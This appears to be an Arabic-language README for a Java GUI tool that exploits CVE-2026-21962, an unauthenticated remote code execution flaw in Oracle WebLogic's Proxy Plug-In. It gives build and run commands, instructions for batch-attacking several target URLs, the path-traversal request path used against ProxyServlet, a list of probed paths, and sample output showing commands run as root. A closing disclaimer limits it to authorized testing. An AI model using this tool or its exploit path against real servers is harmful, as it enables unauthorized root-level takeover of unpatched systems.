
أداة بواجهة رسومية بلغة Java لاستغلال ثغرة CVE-2026-21962، وهي ثغرة تنفيذ أوامر عن بُعد (RCE) غير مصادق عليها في المكوّن الإضافي للوكيل (Proxy Plug-In) الخاص بـ Oracle WebLogic، مما يتيح تنفيذ الأوامر على أهداف متعددة عبر HTTP.
نسخة Java GUI من أداة استغلال ثغرة Oracle WebLogic Server Proxy Plug-In RCE (تنفيذ التعليمات البرمجية عن بُعد).
java-version/
├── pom.xml # ملف إعداد مشروع Maven
├── README.md # ملف توثيق المشروع
├── run.bat # سكربت تشغيل Windows
└── src/
└── main/
└── java/
└── com/
└── ashwesker/
└── cve202621962/
├── Main.java # نقطة دخول البرنامج
├── core/
│ └── Exploit.java # المنطق الأساسي للاستغلال
├── gui/
│ └── MainWindow.java # النافذة الرئيسية للواجهة الرسومية
└── util/
└── HttpClient.java # أداة طلبات HTTP
تحتوي نافذة البرنامج على المناطق التالية:
منطقة معلمات الإدخال (الأعلى)
منطقة الأزرار (الوسط)
منطقة سجل التنفيذ (الأسفل يسار)
منطقة إخراج الأوامر (الأسفل يمين)
cd java-version
mvn clean compile
mvn clean package
يقع ملف JAR المعبأ في: target/cve-2026-21962-1.0.0.jar
انقر نقرًا مزدوجًا على ملف run.bat لتشغيل البرنامج
cd java-version
mvn exec:java -Dexec.mainClass="com.ashwesker.cve202621962.Main"
java -jar target/cve-2026-21962-1.0.0.jar
cd java-version
mvn clean compile
java -cp "target/classes;[مسار جرة التبعيات]" com.ashwesker.cve202621962.Main
عنوان URL الهدف:
http://192.168.1.100:7001
أمر التنفيذ:
whoami
عنوان URL الهدف:
http://192.168.1.100:7001
http://192.168.1.101:7001
http://192.168.1.102:7001
https://weblogic.example.com:4443
أمر التنفيذ:
id
مثال على نتيجة الإخراج:
[*] بدء اختبار الثغرة...
[*] عنوان URL الهدف: http://192.168.1.100:7001
[*] أمر التنفيذ: id
[*] مسار الاختبار: http://192.168.1.100:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] نجاح! رمز الحالة: 200
[+] تم تنفيذ الأمر بنجاح!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
================================================================================
[*] بدء اختبار الثغرة...
[*] عنوان URL الهدف: http://192.168.1.101:7001
[*] أمر التنفيذ: id
[*] مسار الاختبار: http://192.168.1.101:7001/weblogic//weblogic/..;/bea_wls_internal/ProxyServlet
[+] نجاح! رمز الحالة: 200
[+] تم تنفيذ الأمر بنجاح!
uid=0(root) gid=0(root) groups=0(root)
------------------------------------------------------------
بعد تشغيل البرنامج، أدخل عنوان الخادم الهدف في حقل "عنوان URL الهدف"
http://target:7001 أو https://oracle-server:4443أدخل الأمر المراد تنفيذه في حقل "أمر التنفيذ"
whoami, id, powershell -c ... إلخانقر على زر "تنفيذ الاستغلال" لبدء الاختبار
راجع "سجل التنفيذ" بالأسفل لمعرفة عملية الاختبار
راجع "إخراج الأوامر" بالأسفل للحصول على نتائج تنفيذ الأمر
أدخل عناوين أهداف متعددة في حقل "عنوان URL الهدف"، عنوان واحد لكل سطر
http://target1:7001
http://target2:7001
https://target3:4443
أدخل الأمر المراد تنفيذه في حقل "أمر التنفيذ"
انقر على زر "تنفيذ الاستغلال" لبدء الاختبار الدفعي
سيقوم البرنامج باختبار كل هدف بالتتابع، ويتم فصل نتائج الأهداف المختلفة بعلامة ================ (80 علامة يساوي)
راجع "سجل التنفيذ" بالأسفل لمعرفة عملية اختبار كل هدف
راجع "إخراج الأوامر" بالأسفل للحصول على نتائج تنفيذ الأوامر لجميع الأهداف
يقوم البرنامج تلقائيًا باختبار المسارات التالية:
/weblogic//wl_proxy//bea_wls_internal//_proxy//proxy/⚠️ تحذير: هذه الأداة مخصصة لاختبارات الأمان المصرح بها فقط. استخدام هذه الأداة لمهاجمة الأنظمة دون إذن يعد غير قانوني.
Main.java
Exploit.java
MainWindow.java
HttpClient.java
هذا المشروع مخصص لأغراض التعليم والبحث الأمني فقط.